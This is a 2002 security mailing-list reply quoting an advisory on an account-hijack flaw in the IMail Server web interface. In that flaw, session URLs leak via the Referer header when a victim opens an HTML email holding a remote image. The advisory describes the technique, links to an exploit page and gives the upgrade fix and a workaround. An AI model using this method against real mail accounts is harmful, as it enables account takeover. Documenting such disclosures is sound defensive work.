Hi all, I think this was already covered for Imail 7.04 in the following advisory: http://cert.uni-stuttgart.de/archive/bugtraq/2001/10/msg00082.html The workaround given by Ipswitch was: Turn off the "ignore source address in security check" option. This isn't a bullet proof workaround (think of proxies,nat etc) but can help to prevent abuse of this issue. zillion On Sun, 10 Mar 2002, Obscure wrote: > Advisory Title: IMail Account hijack through the Web Interface > Release Date: 10/03/2002 > Application: IMail Server > > Platform: Windows NT4 > Windows 2000 > Windows XP > > Version: 7.05 or earlier > > Severity: Malicious users can easily access other people's accounts. > > Author: Obscure^ [ obscure@eyeonsecurity.net ] > > Vendor Status: Informed on 21 Feb 2002, a fix was already issued to > customers. > > > Web: > > http://www.eyeonsecurity.net > http://www.ipswitch.com > > > > Background. > > (extracted from > http://www.ipswitch.com/Products/IMail_Server/index.html) > > The 20-Minute E-Mail Solution. > IMail Server is an easy-to-use, web-enabled, secure and > spam-resistant > mail server for Windows NT/2000/XP. It is the choice > of businesses, schools, and service providers. > > A Great Price-Performer. > Unlike Microsoft® Exchange and Lotus® Notes, which are costly to > deploy and cumbersome to administer, IMail Server is easy > to install and easy to manage. It has a simple pricing structure and > is scalable to thousands of users per server. > > > Problem. > > When a user logs in to his account through the Web interface, the > session authentication is maintained via a unique URL. > By sending an html e-mail which includes an image at another server, > an attacker can easily get the unique URL via the > referer field in the HTTP header. > > > Exploit Example. > > http://eyeonsecurity.net/tools/referer.html > A CGI script sends an e-mail with an attached image, pointing to > another CGI script which sends the referer URL to the > attacker. > > > Fix > > Upgrade to IMail 7.06. The fixed version checks for the IP. The > authentication now relies on the unique URL and the IP > address. Of course users who log in to IMail Web interface from > behind > proxies, are still vulnerable. > > > ps. this same vulnerability effects Excite WebMail. The Excite guys > did not contact me back. > > > Disclaimer. > > The information within this document may change without notice. Use > of > this information constitutes acceptance for use in an AS IS > condition. There are NO warranties with regard to this information. > In no event shall the author be liable for any consequences > whatsoever > arising out of or in connection with the use or spread of this > information. Any use of this information lays within the user's > responsibility. > > > Feedback. > > Please send suggestions, updates, and comments to: > > Eye on Security > mail : obscure@eyeonsecurity.net > web : http://www.eyeonsecurity.net > >
